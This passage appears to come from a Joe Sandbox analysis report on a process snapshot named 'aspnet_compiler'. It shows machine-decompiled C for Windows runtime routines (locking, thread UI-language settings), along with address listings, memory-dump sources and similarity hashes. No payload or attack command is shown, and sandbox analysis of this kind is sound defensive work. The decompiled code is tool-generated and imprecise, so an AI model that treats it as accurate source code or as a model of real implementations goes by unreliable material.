                                                                                        0x011c2a35
                                                                                        0x011c2a3a
                                                                                        0x011c2a3d
                                                                                        0x011c2a42
                                                                                        0x011c2a59
                                                                                        0x011c2a59
                                                                                        0x011c2a5c
                                                                                        0x011c2a5f
                                                                                        0x011c2a5f
                                                                                        0x011c29fa
                                                                                        0x011c29f3
                                                                                        0x011c2a64
                                                                                        0x011c2a64
                                                                                        0x011c2a6b
                                                                                        0x011c2a6b
                                                                                        0x011c2a6d
                                                                                        0x011c2a72
                                                                                        0x011c2a72
                                                                                        0x00000000

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: PATH
                                                                                        • API String ID: 0-1036084923
                                                                                        • Opcode ID: 299f272378728dc761d7a78ba7dbc042a52a1d4f849233924a5b8f172fdb3c37
                                                                                        • Instruction ID: b3164e21ec4ded78ba390c12f90b14f386f284370fd86b8e5681481ca5ec4676
                                                                                        • Opcode Fuzzy Hash: 299f272378728dc761d7a78ba7dbc042a52a1d4f849233924a5b8f172fdb3c37
                                                                                        • Instruction Fuzzy Hash: 05C1C271E10619DBCB29DF9CD880BADBBB1FF68B04F45402DE901BB290E774A941CB60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0119C962 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 42%
                                                                                        			E0119C962(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				intOrPtr _t22;
				void* _t26;
				void* _t27;
				void* _t32;
				intOrPtr _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x128d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E011AEEF0(0x12870a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0121F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E011AEB70(_t29, 0x12870a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E011DB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0121F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x12870c0; // 0x0
					while(_t38 != 0x12870c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x128b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                                                                        0x0119c96a
                                                                                        0x0119c974
                                                                                        0x0119c988
                                                                                        0x0119c98a
                                                                                        0x01207c9d
                                                                                        0x01207c9f
                                                                                        0x01207ca4
                                                                                        0x01207cae
                                                                                        0x01207cf0
                                                                                        0x01207cf5
                                                                                        0x01207cfa
                                                                                        0x0119c992
                                                                                        0x0119c996
                                                                                        0x0119c997
                                                                                        0x0119c998
                                                                                        0x0119c9a3
                                                                                        0x0119c9a3
                                                                                        0x01207cb0
                                                                                        0x01207cb7
                                                                                        0x01207cbb
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01207cbd
                                                                                        0x01207ce8
                                                                                        0x01207cc5
                                                                                        0x01207cc8
                                                                                        0x01207cca
                                                                                        0x01207cd0
                                                                                        0x01207cd6
                                                                                        0x01207cde
                                                                                        0x01207ce4
                                                                                        0x01207ce4
                                                                                        0x01207cd0
                                                                                        0x00000000
                                                                                        0x01207ce8
                                                                                        0x0119c990
                                                                                        0x00000000

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: db478db24bb84980cadaa1eade1153a0d5dae576868a69c2dea30b8589797d62
                                                                                        • Instruction ID: cc90e0a20340d7f638f144595e94f976cae46a2d4bfdd9a79a14fd8a1a8d062f
                                                                                        • Opcode Fuzzy Hash: db478db24bb84980cadaa1eade1153a0d5dae576868a69c2dea30b8589797d62
                                                                                        • Instruction Fuzzy Hash: 841108313206079BC715AF2CDC45A2BBBE5FB94614B20062CF99183692DB20FC15C7D1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011CFAB0 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 80%
                                                                                        			E011CFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E011AEEF0(0x1287b60);
					_t134 =  *0x1287b84; // 0x77e17b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x1287b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x1287b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E011A6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E011A76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01238938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0119B150();
													}
													_t116 = E01236D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E011A75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x1288638; // 0x0
																	_t122 = L011A38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E011A76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E011A76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L011CFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L011A70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E011CFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E011CFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E011CFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E011CFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E011CFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x1287b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x1287b84 = _t75;
						_t73 = E011AEB70(_t134, 0x1287b60);
						if( *0x1287b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E011AFF60( *0x1287b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                                                        0x011cfab0
                                                                                        0x011cfab2
                                                                                        0x011cfab3
                                                                                        0x011cfab4
                                                                                        0x011cfabc
                                                                                        0x011cfac0
                                                                                        0x011cfb14
                                                                                        0x011cfb17
                                                                                        0x011cfac2
                                                                                        0x011cfac8
                                                                                        0x011cfacd
                                                                                        0x011cfad3
                                                                                        0x011cfad3
                                                                                        0x011cfadd
                                                                                        0x011cfb18
                                                                                        0x011cfb1b
                                                                                        0x011cfb1d
                                                                                        0x011cfb1e
                                                                                        0x011cfb1f
                                                                                        0x011cfb20
                                                                                        0x011cfb21
                                                                                        0x011cfb22
                                                                                        0x011cfb23
                                                                                        0x011cfb24
                                                                                        0x011cfb25
                                                                                        0x011cfb26
                                                                                        0x011cfb27
                                                                                        0x011cfb28
                                                                                        0x011cfb29
                                                                                        0x011cfb2a
                                                                                        0x011cfb2b
                                                                                        0x011cfb2c
                                                                                        0x011cfb2d
                                                                                        0x011cfb2e
                                                                                        0x011cfb2f
                                                                                        0x011cfb3a
                                                                                        0x011cfb3b
                                                                                        0x011cfb3e
                                                                                        0x011cfb41
                                                                                        0x011cfb44
                                                                                        0x011cfb47
                                                                                        0x011cfb4a
                                                                                        0x011cfb4d
                                                                                        0x011cfb53
                                                                                        0x0120bdcb
                                                                                        0x0120bdcb
                                                                                        0x011cfb59
                                                                                        0x011cfb5b
                                                                                        0x011cfb5b
                                                                                        0x011cfb5e
                                                                                        0x0120bdd5
                                                                                        0x0120bdd8
                                                                                        0x00000000
                                                                                        0x0120bdda
                                                                                        0x00000000
                                                                                        0x0120bdda
                                                                                        0x011cfb64
                                                                                        0x011cfb64
                                                                                        0x011cfb64
                                                                                        0x011cfb67
                                                                                        0x011cfb6e
                                                                                        0x011cfb70
                                                                                        0x011cfb72
                                                                                        0x00000000
                                                                                        0x011cfb78
                                                                                        0x011cfb7a
                                                                                        0x011cfb7a
                                                                                        0x011cfb7d
                                                                                        0x011cfb80
                                                                                        0x0120bddf
                                                                                        0x0120bde1
                                                                                        0x00000000
                                                                                        0x0120bde3
                                                                                        0x00000000
                                                                                        0x0120bde3
                                                                                        0x011cfb86
                                                                                        0x011cfb86
                                                                                        0x011cfb86
                                                                                        0x011cfb8b
                                                                                        0x011cfb90
                                                                                        0x011cfb92
                                                                                        0x011cfb94
                                                                                        0x011cfb9a
                                                                                        0x011cfb9b
                                                                                        0x011cfba1
                                                                                        0x0120bde8
                                                                                        0x0120bdeb
                                                                                        0x0120bded
                                                                                        0x0120beb5
                                                                                        0x0120beb5
                                                                                        0x0120bebb
                                                                                        0x0120bebd
                                                                                        0x0120bec3
                                                                                        0x0120bed2
                                                                                        0x0120bedd
                                                                                        0x0120bedd
                                                                                        0x0120beed
                                                                                        0x00000000
                                                                                        0x0120bdf3
                                                                                        0x0120bdfe
                                                                                        0x0120be06
                                                                                        0x0120be0b
                                                                                        0x0120be0d
                                                                                        0x0120be0f
                                                                                        0x0120be14
                                                                                        0x0120be19
                                                                                        0x0120be20
                                                                                        0x0120be25
                                                                                        0x0120be27
                                                                                        0x0120be35
                                                                                        0x0120be39
                                                                                        0x0120be46
                                                                                        0x0120be4f
                                                                                        0x0120be54
                                                                                        0x0120be56
                                                                                        0x0120bef8
                                                                                        0x0120bef8
                                                                                        0x00000000
                                                                                        0x0120be5c
                                                                                        0x0120be5c
                                                                                        0x0120be60
                                                                                        0x00000000
                                                                                        0x0120be66
                                                                                        0x0120be66
                                                                                        0x0120be7f
                                                                                        0x0120be84
                                                                                        0x0120be87
                                                                                        0x0120be89
                                                                                        0x0120be8b
                                                                                        0x0120be99
                                                                                        0x0120be9d
                                                                                        0x0120bea0
                                                                                        0x0120beac
                                                                                        0x0120beaf
                                                                                        0x0120beb1
                                                                                        0x0120beb3
                                                                                        0x0120beb3
                                                                                        0x00000000
                                                                                        0x0120bea2
                                                                                        0x0120bea2
                                                                                        0x00000000
                                                                                        0x0120bea2
                                                                                        0x0120be8d
                                                                                        0x0120be8d
                                                                                        0x0120be92
                                                                                        0x00000000
                                                                                        0x0120be92
                                                                                        0x0120be8b
                                                                                        0x0120be60
                                                                                        0x0120be3b
                                                                                        0x0120be3b
                                                                                        0x0120be3e
                                                                                        0x00000000
                                                                                        0x0120be40
                                                                                        0x0120be40
                                                                                        0x0120be44
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0120be44
                                                                                        0x0120be3e
                                                                                        0x0120be29
                                                                                        0x0120be29
                                                                                        0x00000000
                                                                                        0x0120be29
                                                                                        0x0120be27
                                                                                        0x00000000
                                                                                        0x011cfba7
                                                                                        0x011cfba7
                                                                                        0x011cfbab
                                                                                        0x0120bf02
                                                                                        0x011cfbb1
                                                                                        0x011cfbb1
                                                                                        0x011cfbb8
                                                                                        0x011cfbbd
                                                                                        0x011cfbbd
                                                                                        0x011cfbbf
                                                                                        0x011cfbbf
                                                                                        0x011cfbc5
                                                                                        0x011cfbcb
                                                                                        0x011cfbf8
                                                                                        0x011cfbf8
                                                                                        0x011cfbfa
                                                                                        0x00000000
                                                                                        0x011cfc00
                                                                                        0x011cfc00
                                                                                        0x011cfc03
                                                                                        0x00000000
                                                                                        0x011cfc09
                                                                                        0x011cfc09
                                                                                        0x011cfc0f
                                                                                        0x011cfc15
                                                                                        0x011cfc23
                                                                                        0x011cfc23
                                                                                        0x011cfc25
                                                                                        0x011cfc27
                                                                                        0x011cfc75
                                                                                        0x011cfc7c
                                                                                        0x011cfc84
                                                                                        0x00000000
                                                                                        0x011cfc29
                                                                                        0x011cfc29
                                                                                        0x011cfc2d
                                                                                        0x011cfc30
                                                                                        0x0120bf0f
                                                                                        0x00000000
                                                                                        0x011cfc36
                                                                                        0x011cfc38
                                                                                        0x011cfc3b
                                                                                        0x011cfc41
                                                                                        0x0120bf17
                                                                                        0x0120bf19
                                                                                        0x0120bf48
                                                                                        0x0120bf4b
                                                                                        0x00000000
                                                                                        0x0120bf1b
                                                                                        0x0120bf22
                                                                                        0x0120bf24
                                                                                        0x0120bf26
                                                                                        0x00000000
                                                                                        0x0120bf2c
                                                                                        0x0120bf37
                                                                                        0x0120bf39
                                                                                        0x0120bf3b
                                                                                        0x00000000
                                                                                        0x0120bf41
                                                                                        0x0120bf41
                                                                                        0x0120bf41
                                                                                        0x0120bf41
                                                                                        0x0120bf45
                                                                                        0x00000000
                                                                                        0x0120bf45
                                                                                        0x0120bf3b
                                                                                        0x0120bf26
                                                                                        0x00000000
                                                                                        0x011cfc47
                                                                                        0x011cfc47
                                                                                        0x011cfc49
                                                                                        0x011cfcb2
                                                                                        0x011cfcb4
                                                                                        0x011cfcb6
                                                                                        0x011cfcdc
                                                                                        0x011cfcdc
                                                                                        0x00000000
                                                                                        0x011cfcb8
                                                                                        0x011cfcc3
                                                                                        0x011cfcc5
                                                                                        0x011cfcc7
                                                                                        0x00000000
                                                                                        0x011cfcc9
                                                                                        0x011cfcc9
                                                                                        0x011cfccd
                                                                                        0x00000000
                                                                                        0x011cfccd
                                                                                        0x011cfcc7
                                                                                        0x00000000
                                                                                        0x011cfc4b
                                                                                        0x011cfc4b
                                                                                        0x011cfc4e
                                                                                        0x011cfc4e
                                                                                        0x011cfc51
                                                                                        0x011cfc51
                                                                                        0x011cfc54
                                                                                        0x011cfc5a
                                                                                        0x011cfc5c
                                                                                        0x011cfc5f
                                                                                        0x011cfc61
                                                                                        0x011cfc63
                                                                                        0x011cfc65
                                                                                        0x011cfc67
                                                                                        0x011cfc6e
                                                                                        0x011cfc72
                                                                                        0x011cfc72
                                                                                        0x011cfc72
                                                                                        0x011cfc72
                                                                                        0x011cfc67
                                                                                        0x011cfc61
                                                                                        0x00000000
                                                                                        0x011cfc5a
                                                                                        0x011cfc49
                                                                                        0x011cfc41
                                                                                        0x011cfc30
                                                                                        0x011cfc27
                                                                                        0x011cfc03
                                                                                        0x011cfbcd
                                                                                        0x011cfbd3
                                                                                        0x011cfbd9
                                                                                        0x011cfbdc
                                                                                        0x011cfbde
                                                                                        0x011cfc99
                                                                                        0x011cfc9b
                                                                                        0x011cfc9d
                                                                                        0x011cfcd5
                                                                                        0x011cfcd5
                                                                                        0x011cfc89
                                                                                        0x011cfc89
                                                                                        0x00000000
                                                                                        0x011cfc9f
                                                                                        0x011cfc9f
                                                                                        0x011cfca3
                                                                                        0x00000000
                                                                                        0x011cfca3
                                                                                        0x00000000
                                                                                        0x011cfbe4
                                                                                        0x011cfbe4
                                                                                        0x011cfbe4
                                                                                        0x011cfbe4
                                                                                        0x011cfbe9
                                                                                        0x011cfbf2
                                                                                        0x00000000
                                                                                        0x011cfbf2
                                                                                        0x011cfbde
                                                                                        0x011cfbcb
                                                                                        0x011cfbab
                                                                                        0x011cfc8b
                                                                                        0x011cfc8b
                                                                                        0x011cfc8c
                                                                                        0x011cfb80
                                                                                        0x011cfb72
                                                                                        0x011cfb5e
                                                                                        0x011cfc8d
                                                                                        0x011cfc91
                                                                                        0x011cfadf
                                                                                        0x011cfadf
                                                                                        0x011cfae1
                                                                                        0x011cfae4
                                                                                        0x011cfae7
                                                                                        0x011cfaec
                                                                                        0x011cfaf8
                                                                                        0x011cfb00
                                                                                        0x011cfb07
                                                                                        0x011cfb0f
                                                                                        0x011cfb0f
                                                                                        0x011cfb07
                                                                                        0x00000000
                                                                                        0x011cfaf8
                                                                                        0x011cfadd

                                                                                        Strings
                                                                                        • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0120BE0F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                                        • API String ID: 0-865735534
                                                                                        • Opcode ID: 87a9f3e9231b2cc2a97408f46f47cb1e855b3577d6bd36c30b15d8590cd8e3dc
                                                                                        • Instruction ID: 4caaca70936c208369c30261d88027d35939a1be1260773b993337108ec48e72
                                                                                        • Opcode Fuzzy Hash: 87a9f3e9231b2cc2a97408f46f47cb1e855b3577d6bd36c30b15d8590cd8e3dc
                                                                                        • Instruction Fuzzy Hash: 90A12875B106078BE73ADB68C454B7EB7A6AF64B24F04466DEA06CB6C1DB30DC02CB45
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01192D8A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 63%
                                                                                        			E01192D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x1285350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x1287bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E011D97C0();
				}
				if( *0x12879c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x12879c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E011C1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E011B7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0122FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E011D9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E011CE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								E011EDF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x1286901;
								_push(_t109);
								_v52 = _t98;
								if( *0x1286901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E011D9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E011D95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E011B7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
